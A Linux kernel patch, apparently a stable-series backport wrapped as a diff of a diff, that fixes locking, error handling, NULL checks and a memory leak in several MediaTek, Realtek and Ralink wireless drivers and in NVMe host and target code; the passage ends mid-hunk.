+diff --git a/drivers/net/wireless/mediatek/mt76/dma.c b/drivers/net/wireless/mediatek/mt76/dma.c
+index 478bffb7418d9..c406cb1a102ff 100644
+--- a/drivers/net/wireless/mediatek/mt76/dma.c
++++ b/drivers/net/wireless/mediatek/mt76/dma.c
+@@ -436,7 +436,9 @@ free:
+ free_skb:
+ 	status.skb = tx_info.skb;
+ 	hw = mt76_tx_status_get_hw(dev, tx_info.skb);
++	spin_lock_bh(&dev->rx_lock);
+ 	ieee80211_tx_status_ext(hw, &status);
++	spin_unlock_bh(&dev->rx_lock);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76.h b/drivers/net/wireless/mediatek/mt76/mt76.h
+index 7bcf7a6b67df3..9c753c6aabeff 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76.h
+@@ -904,10 +904,11 @@ bool __mt76_poll(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+ 
+ #define mt76_poll(dev, ...) __mt76_poll(&((dev)->mt76), __VA_ARGS__)
+ 
+-bool __mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+-		      int timeout);
+-
+-#define mt76_poll_msec(dev, ...) __mt76_poll_msec(&((dev)->mt76), __VA_ARGS__)
++bool ____mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
++			int timeout, int kick);
++#define __mt76_poll_msec(...)         ____mt76_poll_msec(__VA_ARGS__, 10)
++#define mt76_poll_msec(dev, ...)      ____mt76_poll_msec(&((dev)->mt76), __VA_ARGS__, 10)
++#define mt76_poll_msec_tick(dev, ...) ____mt76_poll_msec(&((dev)->mt76), __VA_ARGS__)
+ 
+ void mt76_mmio_init(struct mt76_dev *dev, void __iomem *regs);
+ void mt76_pci_disable_aspm(struct pci_dev *pdev);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+index 49a511ae8161d..6cff346d57a78 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7603/mac.c
+@@ -1279,8 +1279,11 @@ void mt7603_mac_add_txs(struct mt7603_dev *dev, void *data)
+ 	if (wcidx >= MT7603_WTBL_STA || !sta)
+ 		goto out;
+ 
+-	if (mt7603_fill_txs(dev, msta, &info, txs_data))
++	if (mt7603_fill_txs(dev, msta, &info, txs_data)) {
++		spin_lock_bh(&dev->mt76.rx_lock);
+ 		ieee80211_tx_status_noskb(mt76_hw(dev), sta, &info);
++		spin_unlock_bh(&dev->mt76.rx_lock);
++	}
+ 
+ out:
+ 	rcu_read_unlock();
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+index a0412a29fb491..faed43b11ec93 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7615/mac.c
+@@ -1517,8 +1517,11 @@ static void mt7615_mac_add_txs(struct mt7615_dev *dev, void *data)
+ 	if (wcid->phy_idx && dev->mt76.phys[MT_BAND1])
+ 		mphy = dev->mt76.phys[MT_BAND1];
+ 
+-	if (mt7615_fill_txs(dev, msta, &info, txs_data))
++	if (mt7615_fill_txs(dev, msta, &info, txs_data)) {
++		spin_lock_bh(&dev->mt76.rx_lock);
+ 		ieee80211_tx_status_noskb(mphy->hw, sta, &info);
++		spin_unlock_bh(&dev->mt76.rx_lock);
++	}
+ 
+ out:
+ 	rcu_read_unlock();
+@@ -2340,7 +2343,7 @@ void mt7615_coredump_work(struct work_struct *work)
+ 			break;
+ 
+ 		skb_pull(skb, sizeof(struct mt7615_mcu_rxd));
+-		if (data + skb->len - dump > MT76_CONNAC_COREDUMP_SZ) {
++		if (!dump || data + skb->len - dump > MT76_CONNAC_COREDUMP_SZ) {
+ 			dev_kfree_skb(skb);
+ 			continue;
+ 		}
+@@ -2350,6 +2353,8 @@ void mt7615_coredump_work(struct work_struct *work)
+ 
+ 		dev_kfree_skb(skb);
+ 	}
+-	dev_coredumpv(dev->mt76.dev, dump, MT76_CONNAC_COREDUMP_SZ,
+-		      GFP_KERNEL);
++
++	if (dump)
++		dev_coredumpv(dev->mt76.dev, dump, MT76_CONNAC_COREDUMP_SZ,
++			      GFP_KERNEL);
+ }
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+index 46ede1b72bbee..19f02b632a204 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+@@ -539,7 +539,8 @@ void mt76_connac2_mac_write_txwi(struct mt76_dev *dev, __le32 *txwi,
+ 	if (txwi[2] & cpu_to_le32(MT_TXD2_FIX_RATE)) {
+ 		/* Fixed rata is available just for 802.11 txd */
+ 		struct ieee80211_hdr *hdr = (struct ieee80211_hdr *)skb->data;
+-		bool multicast = is_multicast_ether_addr(hdr->addr1);
++		bool multicast = ieee80211_is_data(hdr->frame_control) &&
++				 is_multicast_ether_addr(hdr->addr1);
+ 		u16 rate = mt76_connac2_mac_tx_rate_val(mphy, vif, beacon,
+ 							multicast);
+ 		u32 val = MT_TXD6_FIXED_BW;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+index 025a237c1cce8..546cbe21aab31 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+@@ -1561,8 +1561,16 @@ int mt76_connac_mcu_hw_scan(struct mt76_phy *phy, struct ieee80211_vif *vif,
+ 	req->channel_min_dwell_time = cpu_to_le16(duration);
+ 	req->channel_dwell_time = cpu_to_le16(duration);
+ 
+-	req->channels_num = min_t(u8, sreq->n_channels, 32);
+-	req->ext_channels_num = min_t(u8, ext_channels_num, 32);
++	if (sreq->n_channels == 0 || sreq->n_channels > 64) {
++		req->channel_type = 0;
++		req->channels_num = 0;
++		req->ext_channels_num = 0;
++	} else {
++		req->channel_type = 4;
++		req->channels_num = min_t(u8, sreq->n_channels, 32);
++		req->ext_channels_num = min_t(u8, ext_channels_num, 32);
++	}
++
+ 	for (i = 0; i < req->channels_num + req->ext_channels_num; i++) {
+ 		if (i >= 32)
+ 			chan = &req->ext_channels[i - 32];
+@@ -1582,7 +1590,6 @@ int mt76_connac_mcu_hw_scan(struct mt76_phy *phy, struct ieee80211_vif *vif,
+ 		}
+ 		chan->channel_num = scan_list[i]->hw_value;
+ 	}
+-	req->channel_type = sreq->n_channels ? 4 : 0;
+ 
+ 	if (sreq->ie_len > 0) {
+ 		memcpy(req->ies, sreq->ie, sreq->ie_len);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c b/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c
+index 93d96739f802c..48ef2a5992675 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76x02_mac.c
+@@ -631,8 +631,11 @@ void mt76x02_send_tx_status(struct mt76x02_dev *dev,
+ 
+ 	mt76_tx_status_unlock(mdev, &list);
+ 
+-	if (!status.skb)
++	if (!status.skb) {
++		spin_lock_bh(&dev->mt76.rx_lock);
+ 		ieee80211_tx_status_ext(mt76_hw(dev), &status);
++		spin_unlock_bh(&dev->mt76.rx_lock);
++	}
+ 
+ 	if (!len)
+ 		goto out;
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+index ee7ddda4288b8..20a6724ab5dba 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7915/soc.c
+@@ -1228,6 +1228,8 @@ static const struct of_device_id mt7986_wmac_of_match[] = {
+ 	{},
+ };
+ 
++MODULE_DEVICE_TABLE(of, mt7986_wmac_of_match);
++
+ struct platform_driver mt7986_wmac_driver = {
+ 	.driver = {
+ 		.name = "mt7986-wmac",
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/dma.c b/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
+index d1f10f6d9adc3..fd57c87a29ae3 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/dma.c
+@@ -66,6 +66,24 @@ static void mt7921_dma_prefetch(struct mt7921_dev *dev)
+ 
+ static int mt7921_dma_disable(struct mt7921_dev *dev, bool force)
+ {
++	/* disable WFDMA0 */
++	mt76_clear(dev, MT_WFDMA0_GLO_CFG,
++		   MT_WFDMA0_GLO_CFG_TX_DMA_EN | MT_WFDMA0_GLO_CFG_RX_DMA_EN |
++		   MT_WFDMA0_GLO_CFG_CSR_DISP_BASE_PTR_CHAIN_EN |
++		   MT_WFDMA0_GLO_CFG_OMIT_TX_INFO |
++		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO |
++		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO_PFET2);
++
++	if (!mt76_poll_msec_tick(dev, MT_WFDMA0_GLO_CFG,
++				 MT_WFDMA0_GLO_CFG_TX_DMA_BUSY |
++				 MT_WFDMA0_GLO_CFG_RX_DMA_BUSY, 0, 100, 1))
++		return -ETIMEDOUT;
++
++	/* disable dmashdl */
++	mt76_clear(dev, MT_WFDMA0_GLO_CFG_EXT0,
++		   MT_WFDMA0_CSR_TX_DMASHDL_ENABLE);
++	mt76_set(dev, MT_DMASHDL_SW_CONTROL, MT_DMASHDL_DMASHDL_BYPASS);
++
+ 	if (force) {
+ 		/* reset */
+ 		mt76_clear(dev, MT_WFDMA0_RST,
+@@ -77,24 +95,6 @@ static int mt7921_dma_disable(struct mt7921_dev *dev, bool force)
+ 			 MT_WFDMA0_RST_LOGIC_RST);
+ 	}
+ 
+-	/* disable dmashdl */
+-	mt76_clear(dev, MT_WFDMA0_GLO_CFG_EXT0,
+-		   MT_WFDMA0_CSR_TX_DMASHDL_ENABLE);
+-	mt76_set(dev, MT_DMASHDL_SW_CONTROL, MT_DMASHDL_DMASHDL_BYPASS);
+-
+-	/* disable WFDMA0 */
+-	mt76_clear(dev, MT_WFDMA0_GLO_CFG,
+-		   MT_WFDMA0_GLO_CFG_TX_DMA_EN | MT_WFDMA0_GLO_CFG_RX_DMA_EN |
+-		   MT_WFDMA0_GLO_CFG_CSR_DISP_BASE_PTR_CHAIN_EN |
+-		   MT_WFDMA0_GLO_CFG_OMIT_TX_INFO |
+-		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO |
+-		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO_PFET2);
+-
+-	if (!mt76_poll(dev, MT_WFDMA0_GLO_CFG,
+-		       MT_WFDMA0_GLO_CFG_TX_DMA_BUSY |
+-		       MT_WFDMA0_GLO_CFG_RX_DMA_BUSY, 0, 1000))
+-		return -ETIMEDOUT;
+-
+ 	return 0;
+ }
+ 
+@@ -301,6 +301,10 @@ void mt7921_dma_cleanup(struct mt7921_dev *dev)
+ 		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO |
+ 		   MT_WFDMA0_GLO_CFG_OMIT_RX_INFO_PFET2);
+ 
++	mt76_poll_msec_tick(dev, MT_WFDMA0_GLO_CFG,
++			    MT_WFDMA0_GLO_CFG_TX_DMA_BUSY |
++			    MT_WFDMA0_GLO_CFG_RX_DMA_BUSY, 0, 100, 1);
++
+ 	/* reset */
+ 	mt76_clear(dev, MT_WFDMA0_RST,
+ 		   MT_WFDMA0_RST_DMASHDL_ALL_RST |
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+index 67bf92969a7b7..d3507e86e9cf5 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/mcu.c
+@@ -16,24 +16,6 @@ static bool mt7921_disable_clc;
+ module_param_named(disable_clc, mt7921_disable_clc, bool, 0644);
+ MODULE_PARM_DESC(disable_clc, "disable CLC support");
+ 
+-static int
+-mt7921_mcu_parse_eeprom(struct mt76_dev *dev, struct sk_buff *skb)
+-{
+-	struct mt7921_mcu_eeprom_info *res;
+-	u8 *buf;
+-
+-	if (!skb)
+-		return -EINVAL;
+-
+-	skb_pull(skb, sizeof(struct mt76_connac2_mcu_rxd));
+-
+-	res = (struct mt7921_mcu_eeprom_info *)skb->data;
+-	buf = dev->eeprom.data + le32_to_cpu(res->addr);
+-	memcpy(buf, res->data, 16);
+-
+-	return 0;
+-}
+-
+ int mt7921_mcu_parse_response(struct mt76_dev *mdev, int cmd,
+ 			      struct sk_buff *skb, int seq)
+ {
+@@ -60,8 +42,6 @@ int mt7921_mcu_parse_response(struct mt76_dev *mdev, int cmd,
+ 	} else if (cmd == MCU_EXT_CMD(THERMAL_CTRL)) {
+ 		skb_pull(skb, sizeof(*rxd) + 4);
+ 		ret = le32_to_cpu(*(__le32 *)skb->data);
+-	} else if (cmd == MCU_EXT_CMD(EFUSE_ACCESS)) {
+-		ret = mt7921_mcu_parse_eeprom(mdev, skb);
+ 	} else if (cmd == MCU_UNI_CMD(DEV_INFO_UPDATE) ||
+ 		   cmd == MCU_UNI_CMD(BSS_INFO_UPDATE) ||
+ 		   cmd == MCU_UNI_CMD(STA_REC_UPDATE) ||
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+index 8a53d8f286dbe..c64b0b4e93583 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/pci.c
+@@ -111,9 +111,10 @@ static void mt7921e_unregister_device(struct mt7921_dev *dev)
+ 		napi_disable(&dev->mt76.napi[i]);
+ 	cancel_delayed_work_sync(&pm->ps_work);
+ 	cancel_work_sync(&pm->wake_work);
++	cancel_work_sync(&dev->reset_work);
+ 
+ 	mt7921_tx_token_put(dev);
+-	mt7921_mcu_drv_pmctrl(dev);
++	__mt7921_mcu_drv_pmctrl(dev);
+ 	mt7921_dma_cleanup(dev);
+ 	mt7921_wfsys_reset(dev);
+ 	skb_queue_purge(&dev->mt76.mcu.res_q);
+@@ -256,6 +257,7 @@ static int mt7921_pci_probe(struct pci_dev *pdev,
+ 	struct mt7921_dev *dev;
+ 	struct mt76_dev *mdev;
+ 	int ret;
++	u16 cmd;
+ 
+ 	ret = pcim_enable_device(pdev);
+ 	if (ret)
+@@ -265,6 +267,11 @@ static int mt7921_pci_probe(struct pci_dev *pdev,
+ 	if (ret)
+ 		return ret;
+ 
++	pci_read_config_word(pdev, PCI_COMMAND, &cmd);
++	if (!(cmd & PCI_COMMAND_MEMORY)) {
++		cmd |= PCI_COMMAND_MEMORY;
++		pci_write_config_word(pdev, PCI_COMMAND, cmd);
++	}
+ 	pci_set_master(pdev);
+ 
+ 	ret = pci_alloc_irq_vectors(pdev, 1, 1, PCI_IRQ_ALL_TYPES);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt7921/usb.c b/drivers/net/wireless/mediatek/mt76/mt7921/usb.c
+index 29c0ee330dbed..521bcd577640c 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt7921/usb.c
++++ b/drivers/net/wireless/mediatek/mt76/mt7921/usb.c
+@@ -252,7 +252,7 @@ static int mt7921u_probe(struct usb_interface *usb_intf,
+ 
+ 	ret = mt7921u_dma_init(dev, false);
+ 	if (ret)
+-		return ret;
++		goto error;
+ 
+ 	hw = mt76_hw(dev);
+ 	/* check hw sg support in order to enable AMSDU */
+diff --git a/drivers/net/wireless/mediatek/mt76/tx.c b/drivers/net/wireless/mediatek/mt76/tx.c
+index 6c054850363f6..4482e4ff78044 100644
+--- a/drivers/net/wireless/mediatek/mt76/tx.c
++++ b/drivers/net/wireless/mediatek/mt76/tx.c
+@@ -77,7 +77,9 @@ mt76_tx_status_unlock(struct mt76_dev *dev, struct sk_buff_head *list)
+ 		}
+ 
+ 		hw = mt76_tx_status_get_hw(dev, skb);
++		spin_lock_bh(&dev->rx_lock);
+ 		ieee80211_tx_status_ext(hw, &status);
++		spin_unlock_bh(&dev->rx_lock);
+ 	}
+ 	rcu_read_unlock();
+ }
+@@ -263,7 +265,9 @@ void __mt76_tx_complete_skb(struct mt76_dev *dev, u16 wcid_idx, struct sk_buff *
+ 	if (cb->pktid < MT_PACKET_ID_FIRST) {
+ 		hw = mt76_tx_status_get_hw(dev, skb);
+ 		status.sta = wcid_to_sta(wcid);
++		spin_lock_bh(&dev->rx_lock);
+ 		ieee80211_tx_status_ext(hw, &status);
++		spin_unlock_bh(&dev->rx_lock);
+ 		goto out;
+ 	}
+ 
+diff --git a/drivers/net/wireless/mediatek/mt76/util.c b/drivers/net/wireless/mediatek/mt76/util.c
+index 581964425468f..fc76c66ff1a5a 100644
+--- a/drivers/net/wireless/mediatek/mt76/util.c
++++ b/drivers/net/wireless/mediatek/mt76/util.c
+@@ -24,23 +24,23 @@ bool __mt76_poll(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+ }
+ EXPORT_SYMBOL_GPL(__mt76_poll);
+ 
+-bool __mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
+-		      int timeout)
++bool ____mt76_poll_msec(struct mt76_dev *dev, u32 offset, u32 mask, u32 val,
++			int timeout, int tick)
+ {
+ 	u32 cur;
+ 
+-	timeout /= 10;
++	timeout /= tick;
+ 	do {
+ 		cur = __mt76_rr(dev, offset) & mask;
+ 		if (cur == val)
+ 			return true;
+ 
+-		usleep_range(10000, 20000);
++		usleep_range(1000 * tick, 2000 * tick);
+ 	} while (timeout-- > 0);
+ 
+ 	return false;
+ }
+-EXPORT_SYMBOL_GPL(__mt76_poll_msec);
++EXPORT_SYMBOL_GPL(____mt76_poll_msec);
+ 
+ int mt76_wcid_alloc(u32 *mask, int size)
+ {
+diff --git a/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c b/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
+index 3a035afcf7f99..9a9cfd0ce402d 100644
+--- a/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
++++ b/drivers/net/wireless/ralink/rt2x00/rt2x00dev.c
+@@ -1091,6 +1091,7 @@ static void rt2x00lib_remove_hw(struct rt2x00_dev *rt2x00dev)
+ 	}
+ 
+ 	kfree(rt2x00dev->spec.channels_info);
++	kfree(rt2x00dev->chan_survey);
+ }
+ 
+ static const struct ieee80211_tpt_blink rt2x00_tpt_blink[] = {
+diff --git a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+index 46767dc6d6491..761aeec07cdd9 100644
+--- a/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
++++ b/drivers/net/wireless/realtek/rtl8xxxu/rtl8xxxu_8192e.c
+@@ -1700,6 +1700,7 @@ struct rtl8xxxu_fileops rtl8192eu_fops = {
+ 	.rx_desc_size = sizeof(struct rtl8xxxu_rxdesc24),
+ 	.has_s0s1 = 0,
+ 	.gen2_thermal_meter = 1,
++	.needs_full_init = 1,
+ 	.adda_1t_init = 0x0fc01616,
+ 	.adda_1t_path_on = 0x0fc01616,
+ 	.adda_2t_path_on_a = 0x0fc01616,
+diff --git a/drivers/net/wireless/realtek/rtlwifi/debug.c b/drivers/net/wireless/realtek/rtlwifi/debug.c
+index 0b1bc04cb6adb..9eb26dfe4ca92 100644
+--- a/drivers/net/wireless/realtek/rtlwifi/debug.c
++++ b/drivers/net/wireless/realtek/rtlwifi/debug.c
+@@ -278,8 +278,8 @@ static ssize_t rtl_debugfs_set_write_reg(struct file *filp,
+ 
+ 	tmp_len = (count > sizeof(tmp) - 1 ? sizeof(tmp) - 1 : count);
+ 
+-	if (!buffer || copy_from_user(tmp, buffer, tmp_len))
+-		return count;
++	if (copy_from_user(tmp, buffer, tmp_len))
++		return -EFAULT;
+ 
+ 	tmp[tmp_len] = '\0';
+ 
+@@ -287,7 +287,7 @@ static ssize_t rtl_debugfs_set_write_reg(struct file *filp,
+ 	num = sscanf(tmp, "%x %x %x", &addr, &val, &len);
+ 
+ 	if (num !=  3)
+-		return count;
++		return -EINVAL;
+ 
+ 	switch (len) {
+ 	case 1:
+@@ -375,8 +375,8 @@ static ssize_t rtl_debugfs_set_write_rfreg(struct file *filp,
+ 
+ 	tmp_len = (count > sizeof(tmp) - 1 ? sizeof(tmp) - 1 : count);
+ 
+-	if (!buffer || copy_from_user(tmp, buffer, tmp_len))
+-		return count;
++	if (copy_from_user(tmp, buffer, tmp_len))
++		return -EFAULT;
+ 
+ 	tmp[tmp_len] = '\0';
+ 
+@@ -386,7 +386,7 @@ static ssize_t rtl_debugfs_set_write_rfreg(struct file *filp,
+ 	if (num != 4) {
+ 		rtl_dbg(rtlpriv, COMP_ERR, DBG_DMESG,
+ 			"Format is <path> <addr> <mask> <data>\n");
+-		return count;
++		return -EINVAL;
+ 	}
+ 
+ 	rtl_set_rfreg(hw, path, addr, bitmask, data);
+diff --git a/drivers/net/wireless/realtek/rtw88/mac.c b/drivers/net/wireless/realtek/rtw88/mac.c
+index 2afe64f2abe69..589caeff2033a 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac.c
++++ b/drivers/net/wireless/realtek/rtw88/mac.c
+@@ -233,7 +233,7 @@ static int rtw_pwr_seq_parser(struct rtw_dev *rtwdev,
+ 
+ 		ret = rtw_sub_pwr_seq_parser(rtwdev, intf_mask, cut_mask, cmd);
+ 		if (ret)
+-			return -EBUSY;
++			return ret;
+ 
+ 		idx++;
+ 	} while (1);
+@@ -247,6 +247,7 @@ static int rtw_mac_power_switch(struct rtw_dev *rtwdev, bool pwr_on)
+ 	const struct rtw_pwr_seq_cmd **pwr_seq;
+ 	u8 rpwm;
+ 	bool cur_pwr;
++	int ret;
+ 
+ 	if (rtw_chip_wcpu_11ac(rtwdev)) {
+ 		rpwm = rtw_read8(rtwdev, rtwdev->hci.rpwm_addr);
+@@ -270,8 +271,9 @@ static int rtw_mac_power_switch(struct rtw_dev *rtwdev, bool pwr_on)
+ 		return -EALREADY;
+ 
+ 	pwr_seq = pwr_on ? chip->pwr_on_seq : chip->pwr_off_seq;
+-	if (rtw_pwr_seq_parser(rtwdev, pwr_seq))
+-		return -EINVAL;
++	ret = rtw_pwr_seq_parser(rtwdev, pwr_seq);
++	if (ret)
++		return ret;
+ 
+ 	if (pwr_on)
+ 		set_bit(RTW_FLAG_POWERON, rtwdev->flags);
+diff --git a/drivers/net/wireless/realtek/rtw89/core.c b/drivers/net/wireless/realtek/rtw89/core.c
+index a703bb70b8f55..9e4a02a322ffe 100644
+--- a/drivers/net/wireless/realtek/rtw89/core.c
++++ b/drivers/net/wireless/realtek/rtw89/core.c
+@@ -3290,18 +3290,22 @@ static int rtw89_core_register_hw(struct rtw89_dev *rtwdev)
+ 	ret = ieee80211_register_hw(hw);
+ 	if (ret) {
+ 		rtw89_err(rtwdev, "failed to register hw\n");
+-		goto err;
++		goto err_free_supported_band;
+ 	}
+ 
+ 	ret = rtw89_regd_init(rtwdev, rtw89_regd_notifier);
+ 	if (ret) {
+ 		rtw89_err(rtwdev, "failed to init regd\n");
+-		goto err;
++		goto err_unregister_hw;
+ 	}
+ 
+ 	return 0;
+ 
+-err:
++err_unregister_hw:
++	ieee80211_unregister_hw(hw);
++err_free_supported_band:
++	rtw89_core_clr_supported_band(rtwdev);
++
+ 	return ret;
+ }
+ 
+diff --git a/drivers/net/wireless/realtek/rtw89/pci.c b/drivers/net/wireless/realtek/rtw89/pci.c
+index 5f8e19639362d..4a012962cd441 100644
+--- a/drivers/net/wireless/realtek/rtw89/pci.c
++++ b/drivers/net/wireless/realtek/rtw89/pci.c
+@@ -3828,25 +3828,26 @@ int rtw89_pci_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	rtw89_pci_link_cfg(rtwdev);
+ 	rtw89_pci_l1ss_cfg(rtwdev);
+ 
+-	ret = rtw89_core_register(rtwdev);
+-	if (ret) {
+-		rtw89_err(rtwdev, "failed to register core\n");
+-		goto err_clear_resource;
+-	}
+-
+ 	rtw89_core_napi_init(rtwdev);
+ 
+ 	ret = rtw89_pci_request_irq(rtwdev, pdev);
+ 	if (ret) {
+ 		rtw89_err(rtwdev, "failed to request pci irq\n");
+-		goto err_unregister;
++		goto err_deinit_napi;
++	}
++
++	ret = rtw89_core_register(rtwdev);
++	if (ret) {
++		rtw89_err(rtwdev, "failed to register core\n");
++		goto err_free_irq;
+ 	}
+ 
+ 	return 0;
+ 
+-err_unregister:
++err_free_irq:
++	rtw89_pci_free_irq(rtwdev, pdev);
++err_deinit_napi:
+ 	rtw89_core_napi_deinit(rtwdev);
+-	rtw89_core_unregister(rtwdev);
+ err_clear_resource:
+ 	rtw89_pci_clear_resource(rtwdev, pdev);
+ err_declaim_pci:
+diff --git a/drivers/net/wwan/t7xx/Makefile b/drivers/net/wwan/t7xx/Makefile
+index dc6a7d682c159..5e6398b527e72 100644
+--- a/drivers/net/wwan/t7xx/Makefile
++++ b/drivers/net/wwan/t7xx/Makefile
+@@ -1,7 +1,5 @@
+ # SPDX-License-Identifier: GPL-2.0-only
+ 
+-ccflags-y += -Werror
+-
+ obj-${CONFIG_MTK_T7XX} := mtk_t7xx.o
+ mtk_t7xx-y:=	t7xx_pci.o \
+ 		t7xx_pcie_mac.o \
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index c54c6ffba0bcd..f502e032e7e46 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -4769,8 +4769,6 @@ static bool nvme_handle_aen_notice(struct nvme_ctrl *ctrl, u32 result)
+ 	u32 aer_notice_type = nvme_aer_subtype(result);
+ 	bool requeue = true;
+ 
+-	trace_nvme_async_event(ctrl, aer_notice_type);
+-
+ 	switch (aer_notice_type) {
+ 	case NVME_AER_NOTICE_NS_CHANGED:
+ 		set_bit(NVME_AER_NOTICE_NS_CHANGED, &ctrl->events);
+@@ -4806,7 +4804,6 @@ static bool nvme_handle_aen_notice(struct nvme_ctrl *ctrl, u32 result)
+ 
+ static void nvme_handle_aer_persistent_error(struct nvme_ctrl *ctrl)
+ {
+-	trace_nvme_async_event(ctrl, NVME_AER_ERROR);
+ 	dev_warn(ctrl->device, "resetting controller due to AER\n");
+ 	nvme_reset_ctrl(ctrl);
+ }
+@@ -4822,6 +4819,7 @@ void nvme_complete_async_event(struct nvme_ctrl *ctrl, __le16 status,
+ 	if (le16_to_cpu(status) >> 1 != NVME_SC_SUCCESS)
+ 		return;
+ 
++	trace_nvme_async_event(ctrl, result);
+ 	switch (aer_type) {
+ 	case NVME_AER_NOTICE:
+ 		requeue = nvme_handle_aen_notice(ctrl, result);
+@@ -4839,7 +4837,6 @@ void nvme_complete_async_event(struct nvme_ctrl *ctrl, __le16 status,
+ 	case NVME_AER_SMART:
+ 	case NVME_AER_CSS:
+ 	case NVME_AER_VS:
+-		trace_nvme_async_event(ctrl, aer_type);
+ 		ctrl->aen_result = result;
+ 		break;
+ 	default:
+diff --git a/drivers/nvme/host/trace.h b/drivers/nvme/host/trace.h
+index 6f0eaf6a15282..4fb5922ffdac5 100644
+--- a/drivers/nvme/host/trace.h
++++ b/drivers/nvme/host/trace.h
+@@ -127,15 +127,12 @@ TRACE_EVENT(nvme_async_event,
+ 	),
+ 	TP_printk("nvme%d: NVME_AEN=%#08x [%s]",
+ 		__entry->ctrl_id, __entry->result,
+-		__print_symbolic(__entry->result,
+-		aer_name(NVME_AER_NOTICE_NS_CHANGED),
+-		aer_name(NVME_AER_NOTICE_ANA),
+-		aer_name(NVME_AER_NOTICE_FW_ACT_STARTING),
+-		aer_name(NVME_AER_NOTICE_DISC_CHANGED),
+-		aer_name(NVME_AER_ERROR),
+-		aer_name(NVME_AER_SMART),
+-		aer_name(NVME_AER_CSS),
+-		aer_name(NVME_AER_VS))
++		__print_symbolic(__entry->result & 0x7,
++			aer_name(NVME_AER_ERROR),
++			aer_name(NVME_AER_SMART),
++			aer_name(NVME_AER_NOTICE),
++			aer_name(NVME_AER_CSS),
++			aer_name(NVME_AER_VS))
+ 	)
+ );
+ 
+diff --git a/drivers/nvme/target/admin-cmd.c b/drivers/nvme/target/admin-cmd.c
+index 76ceaadd6eeaf..31d35279b37a5 100644
+--- a/drivers/nvme/target/admin-cmd.c
++++ b/drivers/nvme/target/admin-cmd.c
+@@ -686,6 +686,13 @@ static bool nvmet_handle_identify_desclist(struct nvmet_req *req)
+ 	}
+ }
+ 
++static void nvmet_execute_identify_ctrl_nvm(struct nvmet_req *req)
++{
++	/* Not supported: return zeroes */
++	nvmet_req_complete(req,
++		   nvmet_zero_sgl(req, 0, sizeof(struct nvme_id_ctrl_nvm)));
++}
++
+ static void nvmet_execute_identify(struct nvmet_req *req)
+ {
+ 	if (!nvmet_check_transfer_len(req, NVME_IDENTIFY_DATA_SIZE))
+@@ -693,13 +700,8 @@ static void nvmet_execute_identify(struct nvmet_req *req)
+ 
+ 	switch (req->cmd->identify.cns) {
+ 	case NVME_ID_CNS_NS:
+-		switch (req->cmd->identify.csi) {
+-		case NVME_CSI_NVM:
+-			return nvmet_execute_identify_ns(req);
+-		default:
+-			break;
+-		}
+-		break;
++		nvmet_execute_identify_ns(req);
++		return;
+ 	case NVME_ID_CNS_CS_NS:
